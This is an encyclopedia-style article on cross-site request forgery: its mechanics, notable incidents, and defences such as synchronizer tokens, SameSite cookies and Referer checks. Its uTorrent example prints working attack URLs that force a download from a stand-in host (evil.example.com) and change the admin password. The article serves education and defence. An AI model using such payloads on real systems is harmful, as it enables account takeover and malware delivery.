Cross-site request forgery

Malicious website exploit where unauthorized commands are transmitted from a trusted user

Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF (sometimes pronounced sea-surf) or XSRF, is a type of malicious exploit of a website or web application where unauthorized commands are submitted from a user that the web application trusts. There are many ways in which a malicious website can transmit such commands; specially-crafted image tags, hidden forms, and JavaScript fetch or XMLHttpRequests, for example, can all work without the user's interaction or even knowledge. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser. In a CSRF attack, an innocent end user is tricked by an attacker into submitting a web request that they did not intend. This may cause actions to be performed on the website that can include inadvertent client or server data leakage, change of session state, or manipulation of an end user's account.

The term "CSRF" is also used as an abbreviation in defences against CSRF attacks, such as techniques that use header data, form data, or cookies, to test for and prevent such attacks.

Characteristics

In a CSRF attack, the attacker's goal is to cause an innocent victim to unknowingly submit a maliciously crafted web request to a website that the victim has privileged access to. This web request can be crafted to include URL parameters, cookies and other data that appear normal to the web server processing the request. At risk are web applications that perform actions based on input from trusted and authenticated users without requiring the user to authorize (e.g. via a popup confirmation) the specific action. A user who is authenticated by a cookie saved in the user's web browser could unknowingly send an HTTP request to a site that trusts the user and thereby cause an unwanted action.

A general property of web browsers is that they will automatically and invisibly include any cookies (including session cookies and others) used by a given domain in any web request sent to that domain. This property is exploited by CSRF attacks. In the event that a user is tricked into inadvertently submitting a request through their browser, these automatically included cookies will cause the forged request to appear real to the web server, and it will perform any appropriately requested actions, including returning data, manipulating session state, or making changes to the victim's account.

In order for a CSRF attack to work, an attacker must identify a reproducible web request that executes a specific action, such as changing an account password, on the target page. Once such a request is identified, a link can be created that generates this malicious request, and that link can be embedded on a page within the attacker's control. This link may be placed in such a way that it is not even necessary for the victim to click the link. For example, it may be embedded within an HTML image tag in an email sent to the victim, which will automatically be loaded when the victim opens their email. Once the victim has clicked the link, their browser will automatically include any cookies used by that website and submit the request to the web server. The web server will not be able to identify the forgery because the request was made by a user that was logged in and submitted all the requisite cookies.

Cross-site request forgery is an example of a confused deputy attack against a web browser because the web browser is tricked into submitting a forged request by a less privileged attacker.

CSRF commonly has the following characteristics:

- It involves sites that rely on a user's identity.
- It exploits the site's trust in that identity.
- It tricks the user's browser into sending HTTP requests to a target site where the user is already authenticated.
- It involves HTTP requests that have side effects.

History

CSRF token vulnerabilities have been known and in some cases exploited since 2001. Because it is carried out from the user's IP address, some website logs might not have evidence of CSRF. Exploits are under-reported, at least publicly, and as of 2007 there were few well-documented examples:

- The Netflix website in 2006 had numerous vulnerabilities to CSRF, which could have allowed an attacker to perform actions such as adding a DVD to the victim's rental queue, changing the shipping address on the account, or altering the victim's login credentials to fully compromise the account.
- The online banking web application of ING Direct was vulnerable to a CSRF attack that allowed illicit money transfers.
- Popular video website YouTube was also vulnerable to CSRF in 2008, and this allowed any attacker to perform nearly all actions of any user.
- McAfee Secure was also vulnerable to CSRF, and it allowed attackers to change their company system. This is fixed in newer versions.

New attacks against web-enabled devices were carried out in 2018, including attempts to change the DNS settings of routers. Some router manufacturers hurriedly released firmware updates to improve protection, and advised users to change router settings to reduce the risk. Details were not released, citing "obvious security reasons".

Example

[Figure: A National Vulnerability Database page describing a CSRF vulnerability]

Attackers who can find a reproducible link that executes a specific action on the target page while the victim is logged in can embed such a link on a page they control and trick the victim into opening it. The attack carrier link may be placed in a location that the victim is likely to visit while logged into the target site (for example, a discussion forum), or sent in an HTML email body or attachment. A real CSRF vulnerability in uTorrent (CVE-2008-6586) exploited the fact that its web console accessible at localhost:8080 allowed critical actions to be executed using a simple GET request:

- Force a .torrent file download:
  http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent
- Change uTorrent administrator password:
  http://localhost:8080/gui/?action=setsetting&s=webui.password&v=eviladmin

Attacks were launched by placing malicious, automatic-action HTML image elements on forums and email spam, so that browsers visiting these pages would open them automatically, without much user action. People running a vulnerable uTorrent version at the same time as opening these pages were susceptible to the attack.

CSRF attacks using image tags are often made from Internet forums, where users are allowed to post images but not JavaScript, for example using BBCode:

  http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent

When accessing the attack link to the local uTorrent application at localhost:8080, the browser would also always automatically send any existing cookies for that domain. This general property of web browsers enables CSRF attacks to exploit their targeted vulnerabilities and execute hostile actions as long as the user is logged into the target website (in this example, the local uTorrent web interface) at the time of the attack.

In the uTorrent example described above, the attack was facilitated by the fact that uTorrent's web interface used GET requests for critical state-changing operations (change credentials, download a file etc.), which RFC 2616 explicitly discourages:

"In particular, the convention has been established that the GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe". This allows user agents to represent other methods, such as POST, PUT and DELETE, in a special way, so that the user is made aware of the fact that a possibly unsafe action is being requested."

Because of this assumption, many existing CSRF prevention mechanisms in web frameworks will not cover GET requests, but rather apply the protection only to HTTP methods that are intended to be state-changing.

Forging login requests

An attacker may forge a request to log the victim into a target website using the attacker's credentials; this is known as login CSRF. Login CSRF makes various novel attacks possible; for instance, an attacker can later log into the site with their legitimate credentials and view private information like activity history that has been saved in the account. This attack has been demonstrated against Google and Yahoo.

HTTP verbs and CSRF

Depending on the type, the HTTP request methods vary in their susceptibility to CSRF attacks (due to the differences in their handling by web browsers). Therefore, the protective measures against an attack depend on the method of the HTTP request.

In HTTP GET, CSRF exploitation is trivial, using methods described above, such as a simple hyperlink containing manipulated parameters and automatically loaded by an IMG tag. By the HTTP specification, however, GET should be used as a safe method, that is, not significantly changing the user's state in the application. Applications using GET for such operations should switch to HTTP POST or use anti-CSRF protection.

With HTTP POST, vulnerability to CSRF depends on the usage scenario:

- In the simplest form of POST, with data encoded as a query string (field1=value1&field2=value2), a CSRF attack is easily implemented using a simple HTML form, and anti-CSRF measures must be applied.
- If data is sent in any other format (JSON, XML), a standard method is to issue a POST request using XMLHttpRequest, with CSRF attacks prevented by the Same-origin policy (SOP) and Cross-origin resource sharing (CORS); there is a technique to send arbitrary content from a simple HTML form using the ENCTYPE attribute. Such a fake request can be distinguished from legitimate ones by the text/plain content type, but if this is not enforced on the server, CSRF can be executed.

Other HTTP methods (PUT, DELETE etc.) can only be issued using XMLHttpRequest, with the Same-origin policy (SOP) and Cross-origin resource sharing (CORS) preventing CSRF; these measures, however, will not be active on websites that explicitly disable them using the Access-Control-Allow-Origin: * header.

Other approaches to CSRF

Additionally, while typically described as a static type of attack, CSRF can also be dynamically constructed as part of a payload for a cross-site scripting attack, as demonstrated by the Samy worm, or constructed on the fly from session information leaked via offsite content and sent to a target as a malicious URL. CSRF tokens could also be sent to a client by an attacker due to session fixation or other vulnerabilities, or guessed via a brute-force attack, rendered on a malicious page that generates thousands of failed requests. The attack class of "Dynamic CSRF", or using a per-client payload for session-specific forgery, was described in 2009 by Nathan Hamiel and Shawn Moyer at the BlackHat Briefings, though the taxonomy has yet to gain wider adoption.

A new vector for composing dynamic CSRF attacks was presented by Oren Ofer at a local OWASP chapter meeting in January 2012 – "AJAX Hammer – Dynamic CSRF".

Effects

Severity metrics have been issued for CSRF token vulnerabilities that result in remote code execution with root privileges, as well as a vulnerability that can compromise a root certificate, which will completely undermine a public key infrastructure.

Limitations

Several things have to happen for cross-site request forgery to succeed:

- The attacker must target either a site that doesn't check the referrer header or a victim with a browser or plugin that allows referer spoofing.
- The attacker must find a form submission at the target site, or a URL that has side effects, that does something (e.g., transfers money, or changes the victim's e-mail address or password).
- The attacker must determine the right values for all the form or URL inputs; if any of them are required to be secret authentication values or IDs that the attacker can't guess, the attack will most likely fail (unless the attacker is extremely lucky in their guess).
- The attacker must lure the victim to a web page with malicious code while the victim is logged into the target site.

The attack is blind: the attacker cannot see what the target website sends back to the victim in response to the forged requests, unless they exploit a cross-site scripting or other bug at the target website. Similarly, the attacker can only target any links or submit any forms that come up after the initial forged request if those subsequent links or forms are similarly predictable. (Multiple targets can be simulated by including multiple images on a page, or by using JavaScript to introduce a delay between clicks.)

Prevention

Most CSRF prevention techniques work by embedding additional authentication data into requests that allows the web application to detect requests from unauthorized locations.

Synchronizer token pattern

Synchronizer token pattern (STP) is a technique where a token, a secret and unique value for each request, is embedded by the web application in all HTML forms and verified on the server side. The token may be generated by any method that ensures unpredictability and uniqueness (e.g. using a hash chain of a random seed). This is called an anti-forgery token in ASP.NET. The attacker is thus unable to place a correct token in their requests to authenticate them.

Example of STP set by Django in an HTML form:

  <input type="hidden" name="csrfmiddlewaretoken" value="KbyUmhTLMpYj7CD2di7JKP1P3qmLlkPt" />

STP is the most compatible, as it only relies on HTML, but introduces some complexity on the server side, due to the burden associated with checking validity of the token on each request. As the token is unique and unpredictable, it also enforces a proper sequence of events (e.g. screen 1, then 2, then 3), which raises a usability problem (e.g. the user opens multiple tabs). It can be relaxed by using a per-session CSRF token instead of a per-request CSRF token.

Cookie-to-header token

Web applications that use JavaScript for the majority of their operations may use the following anti-CSRF technique:

- On an initial visit without an associated server session, the web application sets a cookie. The cookie typically contains a random token which may remain the same for up to the life of the web session:
  Set-Cookie: __Host-csrf_token=i8XNjC4b8KVok4uw5RftR38Wgp2BFwql; Expires=Thu, 23-Jul-2015 10:25:33 GMT; Max-Age=31449600; Path=/; SameSite=Lax; Secure
- JavaScript operating on the client side reads its value and copies it into a custom HTTP header sent with each transactional request:
  X-Csrf-Token: i8XNjC4b8KVok4uw5RftR38Wgp2BFwql
- The server validates presence and integrity of the token.

Security of this technique is based on the assumption that only JavaScript running on the client side of an HTTPS connection to the server that initially set the cookie will be able to read the cookie's value. JavaScript running from a rogue file or email should not be able to successfully read the cookie value to copy into the custom header. Even though the csrf-token cookie may be automatically sent with the rogue request, subject to the cookie's SameSite policy, the server will still expect a valid X-Csrf-Token header.

The CSRF token itself should be unique and unpredictable. It may be generated randomly, or it may be derived from the session token using HMAC:

  csrf_token = HMAC(session_token, application_secret)

The CSRF token cookie must not have the httpOnly flag, as it is intended to be read by JavaScript by design.

This technique is implemented by many modern frameworks, such as Django and AngularJS. Because the token remains constant over the whole user session, it works well with AJAX applications, but does not enforce a sequence of events in the web application.

The protection provided by this technique can be thwarted if the target website disables its same-origin policy using one of the following techniques:

- a clientaccesspolicy.xml file granting unintended access to Silverlight controls
- a crossdomain.xml file granting unintended access to Flash movies

Double Submit Cookie

Similarly to the cookie-to-header approach, but without involving JavaScript, a site can set a CSRF token as a cookie, and also insert it as a hidden field in each HTML form. When the form is submitted, the site can check that the cookie token matches the form token. The same-origin policy prevents an attacker from reading or setting cookies on the target domain, so they cannot put a valid token in their crafted form.

The advantage of this technique over the Synchronizer pattern is that the token does not need to be stored on the server.

SameSite cookie attribute

An additional "SameSite" attribute can be included when the server sets a cookie, instructing the browser on whether to attach the cookie to cross-site requests. If this attribute is set to "strict", then the cookie will only be sent on same-site requests, making CSRF ineffective. However, this requires the browser to recognise and correctly implement the attribute.

Client-side safeguards

Browser extensions such as RequestPolicy (for Mozilla Firefox) or uMatrix (for both Firefox and Google Chrome/Chromium) can prevent CSRF by providing a default-deny policy for cross-site requests. However, this can significantly interfere with the normal operation of many websites. The CsFire extension (also for Firefox) can mitigate the impact of CSRF with less impact on normal browsing, by removing authentication information from cross-site requests.

The NoScript extension for Firefox mitigates CSRF threats by distinguishing trusted from untrusted sites, and removing authentication & payloads from POST requests sent by untrusted sites to trusted ones. The Application Boundary Enforcer module in NoScript also blocks requests sent from internet pages to local sites (e.g. localhost), preventing CSRF attacks on local services (such as uTorrent) or routers.

The Self Destructing Cookies extension for Firefox does not directly protect from CSRF, but can reduce the attack window, by deleting cookies as soon as they are no longer associated with an open tab.

Other techniques

Various other techniques have been used or proposed for CSRF prevention historically:

- Verifying that the request's headers contain X-Requested-With (used by Ruby on Rails before v2.0 and Django before v1.2.5), or checking the HTTP Referer header and/or HTTP Origin header.
- Checking the HTTP Referer header to see if the request is coming from an authorized page is commonly used for embedded network devices because it does not increase memory requirements. However, a request that omits the Referer header must be treated as unauthorized because an attacker can suppress the Referer header by issuing requests from FTP or HTTPS URLs. This strict Referer validation may cause issues with browsers or proxies that omit the Referer header for privacy reasons. Also, old versions of Flash (before 9.0.18) allow malicious Flash to generate GET or POST requests with arbitrary HTTP request headers using CRLF Injection. Similar CRLF injection vulnerabilities in a client can be used to spoof the referrer of an HTTP request.
- The POST request method was for a while perceived as immune to trivial CSRF attacks using parameters in the URL (using the GET method). However, both POST and any other HTTP method can now be easily executed using XMLHttpRequest. Filtering out unexpected GET requests still prevents some particular attacks, such as cross-site attacks using malicious image URLs or link addresses and cross-site information leakage through <script> elements (JavaScript hijacking); it also prevents (non-security-related) problems with aggressive web crawlers and link prefetching.

Cross-site scripting (XSS) vulnerabilities (even in other applications running on the same domain) allow attackers to bypass essentially all CSRF preventions.

See also

- BREACH
- Confused deputy problem
- CRIME
- Web Messaging
- Heap spraying
- Replay attack
- Session fixation
- Application security

External links

- A Most-Neglected Fact About Cross Site Request Forgery
- The Cross-Site Request Forgery FAQ
- Cross-Site Request Forgery from The Web Application Security Consortium Threat Classification Project
